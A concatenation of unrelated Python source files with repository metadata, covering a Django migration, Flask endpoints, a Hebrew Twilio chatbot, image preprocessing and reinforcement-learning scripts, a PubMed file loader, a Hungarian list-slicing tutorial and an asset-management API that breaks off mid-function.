fb6d0251fe6ca08954b8d6eb6b5819a007eb479e | e51ceaf0965f6c8bc6819be7a0659f68a5e0f494 | /meldining/migrations/0001_initial.py | b790376ac9dab13c1078b72583de08d3a45e1175 | [] | no_license | zyrsas/Meldining | dc3b4650d5561e1fb864ff4397451584352187ba | a4399c3928481ac112443f9dba9b96e9144e8f3e | refs/heads/master | 2020-03-17T14:25:29.621633 | 2018-05-16T13:43:26 | 2018-05-16T13:43:26 | 133,671,484 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,294 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.8 on 2018-05-16 12:54
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Cuisine',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100, verbose_name='Title')),
('file', models.FileField(upload_to='', verbose_name='Image')),
],
),
migrations.CreateModel(
name='CuisineType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100, verbose_name='Title')),
('file', models.FileField(upload_to='', verbose_name='Image')),
('description', models.CharField(max_length=300)),
('address', models.CharField(max_length=300)),
('tel', models.CharField(max_length=300)),
('price', models.CharField(max_length=300)),
],
),
]
| [
"zyrsas@gmail.com"
] | zyrsas@gmail.com |
f50bdb4996105f6ed0b9c648a3fcff1ec31af93a | d0e0b5bb93a3aedb5c8ae97219fba03b24a84e7c | /scripting.py | ef8a3e86654e46a303e9e6edb079ac85629f0f36 | [] | no_license | R3LYK/social_media_stock_mentions | 031ecb847cfb3a30008f796abc33a5e8f3c30ff1 | cf8f3d48263fa41f74aae8bea16306156f10f307 | refs/heads/main | 2023-08-17T11:48:21.189450 | 2021-09-13T19:09:01 | 2021-09-13T19:09:01 | 405,258,136 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 32 | py | import csv
def row_factory(row) | [
"kyler.pettitt@gmail.com"
] | kyler.pettitt@gmail.com |
e4ca782977736d9954c8673fb792ca854051d919 | cb2e148af9601b9e11bdad097cca840bc4cc4bb0 | /backend/app/resources/orderResource.py | b1fd66907edd312189420114a1d7de1a911e0c91 | [] | no_license | jgavirias13/pruebaTecnicaSigma | 560df64ca8e4caf1ab1a6ac7cd3624e485351d1f | b6ed42d15c9d842e242d984d11f79134a379e39d | refs/heads/main | 2023-03-28T01:03:04.154030 | 2021-03-25T05:05:47 | 2021-03-25T05:05:47 | 351,245,247 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 798 | py | from flask_restful import Resource
from flask import request
from app.schema.orderSchema import OrderSchema
from app.models.order import Order
from app.models.product import Product
from app.common.util import calculateTotalCompra
orderSchema = OrderSchema()
class OrderResource(Resource):
def post(self):
data = request.get_json()
orderDict = orderSchema.load(data)
product = Product.get_by_id((orderDict['product']['id']))
order = Order(orderDict['productName'], orderDict['totalProduct'],
orderDict['totalCompra'], product)
totalCalculado = calculateTotalCompra(product)
if(totalCalculado != order.totalCompra):
print(totalCalculado)
print('error son diferentes')
else:
order.save()
resp = orderSchema.dump(order)
return resp, 201 | [
"jgavirias13@gmail.com"
] | jgavirias13@gmail.com |
52e88576c46178114061c73d824c6421f1a462db | 0ad2ef394f5c5811ebcb74f99da34d94ca97ef60 | /preprocessor.py | 5c2a6c8bf56c5fda83a9e08f97c7db06bd5073c1 | [] | no_license | efazs/bangla-handwritten-recognision- | ba768808756d20a18d13584638960e3f7f79a883 | 280749e7061e2a53d43c9ed8616f0c0a65f98f81 | refs/heads/master | 2021-10-24T19:24:48.208064 | 2019-03-27T17:54:46 | 2019-03-27T17:54:46 | 178,053,593 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,373 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Mar 6 03:18:05 2019
@author: Efas
"""
# Import libraries
import os,cv2
import numpy as np
from PIL import Image
from numpy import *
import numpy as np
path1 =r"G:\pics\before_reform_originalS"#path containg the original image
#path1=r"G:\pics\pilo\before_reform_originals\0"
#path2 =r"G:\pics\after_reform"
path2 =r"G:\pics\pilo\before_reform_originals" #path where the new image is to be stored
cvpath=path2
image_size=56#56
filter_number=32#64
Batch_size=10#64
dropoutvar=0.2# default for so many days 0.3
classsize=12
classwidth=250
#image_size=32#110
cv_imsize=(image_size,image_size)
listening = os.listdir(path1)
num_samples = size(listening)
#for file in listening:
# im = Image.open(path1+'\\'+file)
# img = im.resize((image_size,image_size))
# gray = img.convert('L')
# gray.save(path2+'\\'+file,"JPEG")
for file in listening:
#im = Image.open(path1+'\\'+file)
im = cv2.imread(path1+'\\'+file)
#img = im.resize((image_size,image_size))
#gray = img.convert('L')
gray= cv2.cvtColor(im,cv2.COLOR_BGR2GRAY)
(thresh,bn)=cv2.threshold(gray,128,255,cv2.THRESH_BINARY|cv2.THRESH_OTSU)
#bn.save(path2+'\\'+file,"JPEG")
img=cv2.resize(bn,cv_imsize,interpolation = cv2.INTER_AREA)
cv2.imwrite(cvpath+'\\'+file,img)
size_64 = cv_imsize
#angle=45
list=[]
for f in os.listdir('.'):
if f.endswith('.png'):
i=Image.open(f)
fn,fext = os.path.splitext(f)
print(fn)
dst_im = Image.new("RGB", (64,64), "white" )#bkgrd size
im = i.convert('RGBA')
#dst_im.paste( rot, (5, 5), rot ) image bkground (height,length), image frame a fixed na rakhle rotate korle rotated part kete jay
rot = im.rotate( 3, expand=1 ).resize(size_64)
dst_im.paste( rot, (0, 0), rot )
dst_im.save('0/{}L3{}'.format(fn,fext))
rot = im.rotate( -3, expand=1 ).resize(size_64)
dst_im.paste( rot, (0, 0), rot ) # image specific frame a fixed rekhe ghurale size small hote thake
dst_im.save('0/{}R3{}'.format(fn,fext))
rot = im.rotate( 6, expand=1 ).resize(size_64)
dst_im.paste( rot, (0, 0), rot )
dst_im.save('0/{}L6{}'.format(fn,fext))
rot = im.rotate( -6, expand=1 ).resize(size_64)
dst_im.paste( rot, (0, 0), rot )
dst_im.save('0/{}R6{}'.format(fn,fext))
rot = im.rotate( 9, expand=1 ).resize(size_64)
dst_im.paste( rot, (0, 0), rot )
dst_im.save('0/{}L9{}'.format(fn,fext))
rot = im.rotate( -9, expand=1 ).resize(size_64)
dst_im.paste( rot, (0, 0), rot )
dst_im.save('0/{}R9{}'.format(fn,fext))
rot = im.rotate( 12, expand=1 ).resize(size_64)
dst_im.paste( rot, (0, 0), rot )
dst_im.save('0/{}L12{}'.format(fn,fext))
rot = im.rotate( -12, expand=1 ).resize(size_64)
dst_im.paste( rot, (0, 0), rot )
dst_im.save('0/{}R12{}'.format(fn,fext))
rot = im.rotate( 15, expand=1 ).resize(size_64)
dst_im.paste( rot, (0, 0), rot )
dst_im.save('0/{}L15{}'.format(fn,fext))
rot = im.rotate( -15, expand=1 ).resize(size_64)
dst_im.paste( rot, (0, 0), rot )
dst_im.save('0/{}R15{}'.format(fn,fext))
| [
"ns.efas@gmail.com"
] | ns.efas@gmail.com |
353f081526d1adc98c5c58ccd4e63448de00b336 | e845aa989b0dc8315ded987e419931fe73f90bcb | /find_difference.py | ce3702730b2066bf9787f87952dfe4ec69ddfd02 | [] | no_license | rolandobloom/find_difference_task | 6ee2c0b6d7dee4521e916d83c10aa4330f42da19 | 2474bfc7a941d36d7a71b70d64965697ddc4a387 | refs/heads/main | 2023-06-09T02:34:14.111188 | 2021-07-01T06:23:57 | 2021-07-01T06:23:57 | 309,392,767 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 347 | py | import re
from methods import ReverseWithReversed
if __name__ == '__main__':
array_a = list(map(int, re.findall(r'[^,\.\s]+', input('enter array A:'))))
array_b = list(map(int, re.findall(r'[^,\.\s]+', input('enter array B:'))))
result = ReverseWithReversed.find_difference(array_a, array_b)
print(f'Min difference: {result}')
| [
"rszocki@bankier.pl"
] | rszocki@bankier.pl |
64ad76f77783d4b8a4cb1b9d87b673ea62470bf1 | f566dfc5ce189d30696b9bf8b7e8bf9b1ef45614 | /Example/DQN_SimpleMaze/DoubleDQN_SimpleMazeTwoD.py | a8615b896bcd6023b12a714b7533a963e26b7691 | [] | no_license | yangyutu/DeepReinforcementLearning-PyTorch | 3dac4ad67fa3a6301d65ca5c63532f2a278e21d7 | 7af59cb883e24429d42a228584cfc96c42f6d35b | refs/heads/master | 2022-08-16T13:46:30.748383 | 2022-07-30T05:47:47 | 2022-07-30T05:47:47 | 169,829,723 | 12 | 6 | null | null | null | null | UTF-8 | Python | false | false | 2,382 | py |
from Agents.DQN.DQN import DQNAgent
from Agents.Core.MLPNet import MultiLayerNetRegression
import json
from torch import optim
from copy import deepcopy
from Env.CustomEnv.SimpleMazeTwoD import SimpleMazeTwoD
import numpy as np
import matplotlib.pyplot as plt
import torch
torch.manual_seed(1)
def plotPolicy(policy, nbActions):
idx, idy = np.where(policy >=0)
action = policy[idx,idy]
plt.scatter(idx, idy, c = action, marker='s', s = 10)
# for i in range(nbActions):
# idx, idy = np.where(policy == i)
# plt.plot(idx,idy, )
# first construct the neutral network
config = dict()
mapName = 'map.txt'
config['trainStep'] = 1000
config['epsThreshold'] = 0.1
config['targetNetUpdateStep'] = 100
config['memoryCapacity'] = 2000
config['trainBatchSize'] = 32
config['gamma'] = 0.9
config['learningRate'] = 0.003
config['netGradClip'] = 1
config['logFlag'] = True
config['logFileName'] = 'SimpleMazeLog/DoubleQtraj' + mapName
config['logFrequency'] = 50
config['netUpdateOption'] = 'doubleQ'
env = SimpleMazeTwoD(mapName)
N_S = env.stateDim
N_A = env.nbActions
netParameter = dict()
netParameter['n_feature'] = N_S
netParameter['n_hidden'] = [100]
netParameter['n_output'] = N_A
policyNet = MultiLayerNetRegression(netParameter['n_feature'],
netParameter['n_hidden'],
netParameter['n_output'])
print(policyNet.state_dict())
targetNet = deepcopy(policyNet)
optimizer = optim.Adam(policyNet.parameters(), lr=config['learningRate'])
agent = DQNAgent(policyNet, targetNet, env, optimizer, torch.nn.MSELoss() ,N_S, N_A, config=config)
policy = deepcopy(env.map)
for i in range(policy.shape[0]):
for j in range(policy.shape[1]):
if env.map[i, j] == 0:
policy[i, j] = -1
else:
policy[i, j] = agent.getPolicy(np.array([i, j]))
np.savetxt('DoubleQSimpleMazePolicyBeforeTrain' + mapName + '.txt', policy, fmt='%d', delimiter='\t')
plotPolicy(policy, N_A)
agent.train()
policy = deepcopy(env.map)
for i in range(policy.shape[0]):
for j in range(policy.shape[1]):
if env.map[i, j] == 0:
policy[i, j] = -1
else:
policy[i, j] = agent.getPolicy(np.array([i, j]))
np.savetxt('DoubleQSimpleMazePolicyAfterTrain' + mapName +'.txt', policy, fmt='%d', delimiter='\t')
plotPolicy(policy, N_A) | [
"yangyutu123@gmail.com"
] | yangyutu123@gmail.com |
51c50551241db4e366b3aea0efdd7ca6f78e8961 | 6fa371c04848cb68c0b1d58533fdd89b7a176008 | /drawing.py | 84ea5dbdfc6f87f20e197b0f81dc156e04dc5e8f | [] | no_license | solversa/coordination | acc626094246f622a45409d0f704f3407286dce9 | 1b115fdb76f58e10402767bf65103b9dd197376b | refs/heads/master | 2021-06-19T01:03:36.974354 | 2017-04-24T05:39:34 | 2017-04-24T05:39:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,144 | py | import numpy as np
import tensorflow as tf
import gym
from utils import *
import random
import os
class Policy():
def __init__(self, observation_space, action_space):
self.observation_space = observation_space
self.action_space = action_space
self.observation_size = self.observation_space.shape[0]
self.action_size = np.prod(self.action_space.shape)
self.hidden_size = 8
weight_init = tf.random_uniform_initializer(0, 0)
bias_init = tf.constant_initializer(0)
self.obs = tf.placeholder(tf.float32, [None, self.observation_size])
self.action = tf.placeholder(tf.float32, [None, self.action_size])
self.advantage = tf.placeholder(tf.float32, [None])
self.oldaction_dist_mu = tf.placeholder(tf.float32, [None, self.action_size])
self.oldaction_dist_logstd = tf.placeholder(tf.float32, [None, self.action_size])
self.policymode = "single"
if self.policymode == "single":
with tf.variable_scope("policy"):
h1 = fully_connected(self.obs, self.observation_size, self.hidden_size, weight_init, bias_init, "policy_h1")
h1 = tf.nn.relu(h1)
h2 = fully_connected(h1, self.hidden_size, self.hidden_size, weight_init, bias_init, "policy_h2")
h2 = tf.nn.relu(h2)
h3 = fully_connected(h2, self.hidden_size, self.action_size, weight_init, bias_init, "policy_h3")
action_dist_logstd_param = tf.Variable((.01*np.random.randn(1, self.action_size)).astype(np.float32), name="policy_logstd")
# means for each action
self.action_dist_mu = h3
# log standard deviations for each actions
self.action_dist_logstd = tf.tile(action_dist_logstd_param, tf.pack((tf.shape(self.action_dist_mu)[0], 1)))
elif self.policymode == "multiple":
action_outputs = []
action_logstds = []
for i in xrange(self.action_size):
with tf.variable_scope("policy"+str(i)):
h1 = fully_connected(self.obs, self.observation_size, self.hidden_size, weight_init, bias_init, "policy_h1")
h1 = tf.nn.relu(h1)
h2 = fully_connected(h1, self.hidden_size, self.hidden_size, weight_init, bias_init, "policy_h2")
h2 = tf.nn.relu(h2)
h3 = fully_connected(h2, self.hidden_size, 1, weight_init, bias_init, "policy_h3")
action_dist_logstd_param = tf.Variable((.01*np.random.randn(1, 1)).astype(np.float32), name="policy_logstd")
action_outputs.append(h3)
action_logstds.append(action_dist_logstd_param)
# means for each action
self.action_dist_mu = tf.concat(1, action_outputs)
# log standard deviations for each actions
self.action_dist_logstd = tf.tile(tf.concat(1, action_logstds), tf.pack((tf.shape(self.action_dist_mu)[0], 1)))
config = tf.ConfigProto(
device_count = {'GPU': 0}
)
self.session = tf.Session(config=config)
self.session.run(tf.initialize_all_variables())
var_list = tf.trainable_variables()
self.set_policy = SetPolicyWeights(self.session, var_list)
self.saver = tf.train.Saver()
self.saver.restore(self.session, tf.train.latest_checkpoint(os.getcwd()+"/training/"))
task = "Reacher-v1"
the_env = gym.make(task)
p = Policy(the_env.observation_space, the_env.action_space)
# saved_policy = np.load("policy.npy")
# for p in saved_policy:
# print p.shape
# p.set_policy(saved_policy)
ob = filter(the_env.reset())
for x in xrange(100):
obs = np.expand_dims(ob, 0)
action_dist_mu, action_dist_logstd = p.session.run([p.action_dist_mu, p.action_dist_logstd], feed_dict={p.obs: obs})
# samples the guassian distribution
act = action_dist_mu + np.exp(action_dist_logstd)*np.random.randn(*action_dist_logstd.shape)
ar = act.ravel()
print ar
res = the_env.step(ar)
ob = filter(res[0])
the_env.render()
raw_input(x)
| [
"kevin@bobthechicken.com"
] | kevin@bobthechicken.com |
543a88f853a1e518b01143a3870652ad879a269a | b51341a9411d48be0214ab84ffebe881b52bc352 | /app.py | 88a4f4359d7f067146d4d3fdaebe717349d5c654 | [] | no_license | charan-kumardot/smartphonebot | 52a89a99a78b1966ae2f5d028aacaeee5de05eee | 2347b6987b942f84abc4c458a1a0fb5332ce59a8 | refs/heads/main | 2023-02-19T00:17:12.665043 | 2021-01-19T16:19:47 | 2021-01-19T16:19:47 | 330,577,442 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,462 | py | from cht import Chat,reflections
from flask import Flask, render_template, request
from twilio.twiml.messaging_response import MessagingResponse
app = Flask(__name__, template_folder='templates')
pairs =[
['(good|hlo|welcome|hello|Hi|hey|שלום|ברוך הבא|בוקר טוב|היי|מה שלומך|הוא|טוֹב|הי|סליחה|אפשר|עזרה)', ['''
ברוכים הבאים למגן סלולרי בהשגחה פרטית, איך אפשר לעזור?
לעזרה ברכישת מכשיר לחץ 1
לעזרה בנושאי שירות לקוחות לחץ 2
תרצו לדבר עם מנהל מכירות לחץ 3
''']],
['(1)', ['באיזה מכשיר אתם מתעניינים?']],
['(2)', ['''
לקוח יקר אם ברשותך מערכת סינון והגנה מבית מושגח פלוס
נא לפנות בכל פנייה לגבי חנות האפליקציות, להוסיף אפליקציה להגביר רמת סינון וכו'...
אל מוקד שירות לקוחות אפליקצית מושגח
בימים א-ה בין השעות 10:00-17:00 : 058-3777779
ניתן גם לפנות אלינו(מומלץ) גם במייל: mp058377@gmail.com
לקוח נכבד, אם ברשותך מערכת סינון והגנה מבית כושר פליי
נא לפנות בכל פנייה לגבי חנות האפליקציות, להוסיף אפליקציה להגביר רמת סינון וכו'...
אל מוקד שירות לקוחות ווטסאפ (לוחצים על המעטפה)
אפליקצית כושר פליי 053-312-3889
ניתן גם לפנות אלינו(מומלץ) גם במייל: kosherplay@gmail.com
נא לשמור על הקופסא ושטר האחריות
תקשורת טובה היא שם המשחק תרגישו חופשי לשתף אותנו
תשאלו תבררו אנחנו כאן לעזור לכם… במייל ובטלפון איך שנוח לכם.
''']],
['(3)', ['רשום בבקשה את מספר הטלפון שלך ונציג יחזור אליך בהקדם']],
[
'([\d{8,15}]|(\d{3}[-\.\s]??\d{3}[-\.\s]??\d{4}|\(\d{3}\)\s*\d{3}[-\.\s]??\d{4}|\d{3}[-\.\s]??\d{4})|^(?:00|\\+)[0-9\\s.\\/-]{6,20}$)',
['תודה רבה מצוות המגן סלולרי בהשגחה פרטית']],
['(.*)', ['רשום בבקשה את מספר הטלפון שלך ונציג יחזור אליך בהקדם']]
]
@app.route('/', methods=['GET', 'POST'])
def samplefunction():
if request.method == 'GET':
return render_template('index.html')
if request.method == 'POST':
greetIn = request.form['human']
greetOut = c(greetIn)
return render_template('index.html',bot1 = greetOut,bot2 = greetIn)
def c(x):
chat = Chat(pairs,reflections)
return chat.respond(x)
@app.route("/sms", methods=['GET', 'POST'])
def sms_reply():
"""Respond to incoming with a simple text message."""
resp = MessagingResponse()
phoneno = request.form.get('From')
msg = request.form.get('Body')
chat = Chat(pairs, reflections)
print(msg)
resp.message(chat.respond(msg))
return str(resp)
if __name__ == '__main__':
app. run(host='127.0.4.21', port=4040)
| [
"noreply@github.com"
] | noreply@github.com |
f92d14e56e3f2106526540e9015138bc89fc3d77 | c12008fee6b319ccc683956d0a171a00e12debb0 | /everyday/e191020.py | 53e6428caf621fada6c4bfabfffe7d54a1250dd8 | [] | no_license | yrnana/algorithm | 70c7b34c82b15598494103bdb49b4aefc7c53548 | 783e4f9a45baf8d6b5900e442d32c2b6f73487d0 | refs/heads/master | 2022-04-13T23:50:53.914225 | 2020-04-01T12:41:14 | 2020-04-01T12:41:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 295 | py | def solution(arr):
l = len(arr)
n = 0
for i in range(l):
if arr[i] != 0:
swap(arr, i, n)
n += 1
return arr
def swap(arr, i, j):
tmp = arr[i]
arr[i] = arr[j]
arr[j] = tmp
print(solution([0, 5, 0, 3, -1]))
print(solution([3, 0, 3]))
| [
"nyryn0945@gmail.com"
] | nyryn0945@gmail.com |
cb002e1559544ff2efdbb9c0ae44c92d54398282 | 8ce5eaba8a2848c17f9a47eb083afdd90887e17e | /scripts/loading/suppl_files/load_pubmed_PMC_files.py | e8c7834e02a0481d3d93a121e901d44195f54939 | [
"MIT"
] | permissive | yeastgenome/SGDBackend-Nex2 | cad926729f9da738b3e82fc85d29b936ed6b8f1a | 017e7248fbc3f1d1e8062d67f26937ec00c3cb8a | refs/heads/master | 2023-08-23T12:24:15.220178 | 2023-06-22T01:22:11 | 2023-06-22T01:22:11 | 46,740,355 | 5 | 7 | MIT | 2023-09-06T20:28:05 | 2015-11-23T18:40:33 | Python | UTF-8 | Python | false | false | 4,239 | py | from src.helpers import upload_file
from src.boto3_upload import upload_one_file_to_s3
from scripts.loading.database_session import get_session
from src.models import Dbentity, Filedbentity, Referencedbentity, Edam,\
FilePath, Path, ReferenceFile, Source
from datetime import datetime
import logging
import os
import sys
import gzip
import logging
__author__ = 'sweng66'
logging.basicConfig(format='%(message)s')
log = logging.getLogger()
log.setLevel(logging.INFO)
CREATED_BY = os.environ['DEFAULT_USER']
supplFileDir = "scripts/loading/suppl_files/pubmed_pmc_download/"
def load_data():
nex_session = get_session()
log.info(datetime.now())
log.info("Getting data from database...")
edam_to_id = dict([(x.format_name, x.edam_id) for x in nex_session.query(Edam).all()])
src = nex_session.query(Source).filter_by(display_name='SGD').one_or_none()
source_id = src.source_id
pmid_to_reference_id_year = dict([(x.pmid, (x.dbentity_id, x.year)) for x in nex_session.query(Referencedbentity).filter(Referencedbentity.pmid.isnot(None)).all()])
log.info(datetime.now())
log.info("Uploading files to s3...")
i = 0
for suppl_file in os.listdir(supplFileDir):
i += 1
pmid = int(suppl_file.replace('.tar.gz', ''))
if pmid in pmid_to_reference_id_year:
(reference_id, year) = pmid_to_reference_id_year[pmid]
update_database_load_file_to_s3(nex_session, i, suppl_file, source_id, edam_to_id, year, reference_id)
else:
log.info("PMID:" + str(pmid) + " is not in the database.")
nex_session.close()
log.info(datetime.now())
log.info("Done!")
def update_database_load_file_to_s3(nex_session, count, suppl_file_name, source_id, edam_to_id, year, reference_id):
suppl_file_with_path = supplFileDir + suppl_file_name
local_file = open(suppl_file_with_path, mode='rb')
import hashlib
md5sum = hashlib.md5(suppl_file_with_path.encode()).hexdigest()
row = nex_session.query(Filedbentity).filter_by(md5sum=md5sum).one_or_none()
if row is not None:
return
row = nex_session.query(Dbentity).filter(Dbentity.display_name == suppl_file_name).all()
if len(row) > 0:
return
data_id = edam_to_id.get('EDAM:2526')
topic_id = edam_to_id.get('EDAM:3070')
format_id = edam_to_id.get('EDAM:2330')
from sqlalchemy import create_engine
from src.models import DBSession
engine = create_engine(os.environ['NEX2_URI'], pool_recycle=3600)
DBSession.configure(bind=engine)
upload_file(CREATED_BY, local_file,
filename=suppl_file_name,
file_extension='gz',
description='PubMed Central download',
display_name=suppl_file_name,
year=year,
data_id=data_id,
format_id=format_id,
topic_id=topic_id,
status='Active',
is_public=True,
is_in_spell=False,
is_in_browser=False,
file_date=datetime.now(),
source_id=source_id,
md5sum=md5sum)
row = nex_session.query(Dbentity).filter_by(display_name=suppl_file_name, dbentity_status='Active').one_or_none()
if row is None:
log.info("The " + suppl_file_name + " is not in the database.")
return
file_id = row.dbentity_id
path = nex_session.query(Path).filter_by(
path="/supplemental_data").one_or_none()
if path is None:
log.info("The path /supplemental_data is not in the database.")
return
path_id = path.path_id
x = FilePath(file_id=file_id,
path_id=path_id,
source_id=source_id,
created_by=CREATED_BY)
nex_session.add(x)
x = ReferenceFile(file_id=file_id,
reference_id=reference_id,
file_type='Supplemental',
source_id=source_id,
created_by=CREATED_BY)
nex_session.add(x)
nex_session.commit()
log.info(str(count) + " done uploading " + suppl_file_name)
if __name__ == '__main__':
load_data()
| [
"noreply@github.com"
] | noreply@github.com |
1d3a69f3fca58fe93dbc386743538093df884e7d | 444e1626df9ff13af6b65ae3dd8b68fdce91de62 | /class_practice2.py | 28d885c6945bf872f6ba9663c1bd51a81308f6d3 | [] | no_license | yash94749/myrepos | 3de56748e506f54a4cfe5ff13f530851873ab5fe | 86ad72637c2de6594fce5afd71270878faf7bee8 | refs/heads/master | 2020-03-12T08:57:21.408278 | 2018-04-22T06:49:34 | 2018-04-22T06:49:34 | 130,540,946 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,045 | py | class company:
def __init__(self,Name,location,types):
self.CompanyName = Name
self.CompanyLocation = location
self.CompanyDomain = types
self.CompanyWebsite = 'www' + '.' + Name + '.com'
class Employee(company):
amount = 1.04
def __init__(self,Name,location,types,emp_first_Name,emp_last_Name,emp_salary):
company.__init__(self,Name,location,types)
self.Emp_FirstName = emp_first_Name
self.Emp_LastName = emp_last_Name
self.Emp_pay = emp_salary
self.emp_email =self.Emp_FirstName + '.' + self.Emp_LastName + '@' + self.CompanyName + '.com'
def emp_raise_salary(self):
return (self.Emp_pay * self.amount)
##cmp1 = company.emp_details('amazon','pune',60000)
###print(cmp1.emp_details('Yashwant','Singh',60000).emp_email)
##print (cmp1.emp_email)
emp1=Employee('amazon','pune','IT','Yashwant','Singh',60000)
print (emp1.CompanyWebsite)
print (emp1.Emp_pay)
print (emp1.emp_raise_salary())
emp1.amount = 10
print (emp1.emp_raise_salary())
| [
"0128it@gmail.com"
] | 0128it@gmail.com |
e7fa14ad1683f757c0af7cb0b591d2e67a9b53df | 4ffee6a04d44c44b3ce4edf50e78dd0a9205db01 | /Datastructures/index_2.py | 64bbfc5476c2a1d12aafa5b462b1c238478e7bf2 | [] | no_license | BercziSandor/pythonCourse_2020_09 | 075fd6481821f32b83aed71ea85fbaeb4d2d3777 | 43144edcc6f114df9568245026276c772f32b79c | refs/heads/master | 2023-04-01T23:09:44.306936 | 2021-03-22T08:32:20 | 2021-03-22T08:32:20 | 299,989,127 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,457 | py | # Értékadás slicing segítségével.
lst = [10, 20, 30, 40, 50]
# Az 1, 2, 3 indexű elemeket le akarjuk cserélni erre: [-2, -3, -4]
lst[1:4] = [-2, -3, -4]
print(lst) # [10, -2, -3, -4, 50]
#######################################
# Ha slicing segítségével végzünk értékadást, akkor az új elemnek egy iterálható
# sorozatnak kell lennie, amelynek az elemei kerülnek be. Ez tehát NEM működik:
lst = [10, 20, 30, 40, 50]
lst[1:4] = 99 # TypeError: can assign only an iterable
#######################################
# Az új sorozat lehet más elemszámú, mint az eredeti:
lst = [10, 20, 30, 40, 50]
lst[1:4] = [-100]
print(lst) # [10, -100, 50]
# A felső határ túlcímzése most sem okoz gondot:
lst = [10, 20, 30, 40, 50]
lst[1:100] = [-2, -3, -4]
print(lst) # [10, -2, -3, -4]
# Ha a kezdő index túl van a lista végén, akkor az elemek hozzáfűződnek a lista végéhez:
lst = [10, 20, 30, 40, 50]
lst[10:100] = [-2, -3, -4]
print(lst) # [10, 20, 30, 40, 50, -2, -3, -4]
# Ha a kezdő index túl van a lista elején, akkor az elemek hozzáfűződnek a lista
# eleje elé:
lst = [10, 20, 30, 40, 50]
lst[-6:1] = [-2, -3, -4]
print(lst) # [-2, -3, -4, 10, 20, 30, 40, 50]
#######################################
# Nyilván egyetlen elemet is le lehet cserélni:
lst = [10, 20, 30, 40, 50]
lst[1:1] = [99, 100]
print(lst) # [10, 99, 100, 30, 40, 50]
#######################################
# A lista helyben marad megváltozott tartalommal:
lst_1 = [10, 20, 30, 40, 50]
lst_2 = lst_1
lst_1[1:1] = [99, 100]
print(lst_2) # [10, 99, 100, 30, 40, 50]
# Így tudunk tehát helyben új listát létrehozni:
lst_1 = [10, 20, 30, 40, 50]
lst_2 = lst_1
lst_1[:] = [99, 100]
print(lst_2) # [99, 100]
#######################################
# A beillesztendő értéksorozat persze nem csak lista, hanem tetszőleges iterálható
# sorozat lehet:
lst = [10, 20, 30, 40, 50]
lst[1:4] = (-2, -3, -4)
print(lst) # [10, -2, -3, -4, 50]
lst = [10, 20, 30, 40, 50]
lst[1:4] = range(5)
print(lst) # [10, 0, 1, 2, 3, 4, 50]
lst = [10, 20, 30, 40, 50]
dic = {'A': 1, 'B': 2}
lst[1:4] = dic.keys()
print(lst) # [10, 'A', 'B', 50] -- a sorrend 3.6 verzió előtt nem garantált!
#######################################
# Törlés slicing segítségével.
lst = [10, 20, 30, 40, 50]
del(lst[1:4])
print(lst) # [10, 50]
lst = [10, 20, 30, 40, 50]
del(lst[1:100])
print(lst) # [10]
#######################################
| [
"Sandor.Berczi@t-systems.com"
] | Sandor.Berczi@t-systems.com |
e3537da9193eb857a9a504c5b9dabd21764f97f7 | 4ff20bb90b85de0adf9f1957a1790b7c6d1fc4b6 | /AssetMP/api.py | 724e26ee8c148ff409154daa35b643fcaa93f510 | [] | no_license | suzihua666/AssetMP | d8544a086536e928b6fccf4268aba79fdab6cddf | c31d3d1e678207547471ad13acda5618773530d8 | refs/heads/master | 2022-05-11T21:53:56.437998 | 2019-02-28T08:04:00 | 2019-02-28T08:04:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,103 | py | # -*- coding: utf-8 -*-
# @Author: richard
# @Date: 2018-04-11 14:35:54
# @Last Modified by: richardzgt
# @Last Modified time: 2018-09-05 14:31:00
# Purpose:
#
from django.http import HttpResponse, Http404
from django.db.models.query import QuerySet
from django.core import serializers
from django.core.paginator import Paginator, EmptyPage, InvalidPage
from models import Asset,group_by
from settings import *
import logging
import logging
import json
import copy
logger = logging.getLogger("bench")
class AmpException(Exception):
def __init__(self, msg, fault):
self.message = str(msg)
self.fault = str(fault)
def __str__(self):
return "[%s]: %s" % (self.fault, self.message)
def set_log(level, filename='AssetMP.log'):
"""
return a log file object
根据提示设置log打印
"""
log_file = os.path.join(LOG_DIR, filename)
if not os.path.isfile(log_file):
os.mknod(log_file)
os.chmod(log_file, 0777)
log_level_total = {'debug': logging.DEBUG, 'info': logging.INFO, 'warning': logging.WARN, 'error': logging.ERROR,
'critical': logging.CRITICAL}
logger_f = logging.getLogger('AssetMP')
logger_f.setLevel(logging.DEBUG)
fh = logging.FileHandler(log_file)
fh.setLevel(log_level_total.get(level, logging.DEBUG))
formatter = logging.Formatter('%(asctime)s - [%(filename)s:%(lineno)d:%(funcName)s] - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
logger_f.addHandler(fh)
return logger_f
# logger = set_log(LOG_LEVEL)
def json_returner(data=''):
if isinstance(data,(QuerySet,dict)):
ret = serializers.serialize("json",data)
return HttpResponse(json.dumps({'status':'success','message':ret}))
return HttpResponse(json.dumps({'status':'failed','message':data}))
def get_rack_rail_template(idc,assets):
"""
paramter: idc_
"""
all_assets = Asset.objects.filter(idc=idc)
if assets:
all_assets = assets
# 根据机架分组
cabinets = group_by(all_assets,'cabinet')
cabinets_template = ""
logger.debug("all_assets[%s] to render", all_assets)
for cabinet in sorted(cabinets):
all_cab_ass = all_assets.filter(cabinet=cabinet)
rest = []
s = """
<div name="{0}" class="rack">
<table class="data-table" id="data_table">
<tbody>
<tr>
<td><p class="rackname">{0}</p></td>
</tr>
""".format(cabinet)
s1 = """
<tr>
